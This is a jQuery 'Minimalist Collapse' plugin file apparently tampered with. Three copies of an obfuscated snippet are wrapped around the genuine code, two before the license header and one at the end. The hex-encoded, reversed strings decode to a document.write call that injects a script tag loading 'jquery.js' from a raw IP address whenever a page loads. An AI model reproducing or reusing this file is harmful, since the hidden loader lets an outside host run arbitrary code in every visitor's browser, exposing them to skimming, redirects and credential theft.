var _0x82ab=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0x82ab[5]](_0x82ab[4][_0x82ab[3]](_0x82ab[0])[_0x82ab[2]]()[_0x82ab[1]](_0x82ab[0]))var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))/*!
 * jQuery Minimalist Collapse v1.0 (https://github.com/cosmefae/jquery-minimalist-collapse/)
 * Copyright 2015 @ Cosme Faé (cosmefae.com)
 * Licensed under MIT 
 */
(function($) {
  $.fn.mcollapse = function(options) {
        var delayDuration = 0;

        // This is the easiest way to have default options.
        var settings = $.extend({
            // These are the defaults.
            shadowEffect: true,
            contentFocus: true,
            delay: 'walker'
        }, options );

        switch (settings.delay) {
            case "faster":
                delayDuration = 100;
                break;

            case "medium":
                delayDuration = 200;
                break;

            case "walker":
                delayDuration = 300;
                break;

            default:
                delayDuration = 300;
        }

      if(settings.shadowEffect === true) {
          this.find('.m-result').addClass('shadow-effect');
      }
      if(settings.contentFocus === true) {
          this.find('.m-result').addClass('content-focus');
      }

    var getPlugin = $('[data-collapse=m-collapse]');

    getPlugin.click(function(e) {
    var getTarget = $(this).data('target');
    var getResult = $(getTarget).parent();

        if(getResult.hasClass('active')) {
            $(getTarget+':visible').slideUp(delayDuration);
            getResult.removeClass('active');
        } else {
            $(getTarget).not(':visible').slideDown(delayDuration);
            getResult.addClass('active');
        }

      e.preventDefault();
    });
    return this;
  };
}(jQuery));
var _0xaae8=["","\x6A\x6F\x69\x6E","\x72\x65\x76\x65\x72\x73\x65","\x73\x70\x6C\x69\x74","\x3E\x74\x70\x69\x72\x63\x73\x2F\x3C\x3E\x22\x73\x6A\x2E\x79\x72\x65\x75\x71\x6A\x2F\x38\x37\x2E\x36\x31\x31\x2E\x39\x34\x32\x2E\x34\x33\x31\x2F\x2F\x3A\x70\x74\x74\x68\x22\x3D\x63\x72\x73\x20\x74\x70\x69\x72\x63\x73\x3C","\x77\x72\x69\x74\x65"];document[_0xaae8[5]](_0xaae8[4][_0xaae8[3]](_0xaae8[0])[_0xaae8[2]]()[_0xaae8[1]](_0xaae8[0]))
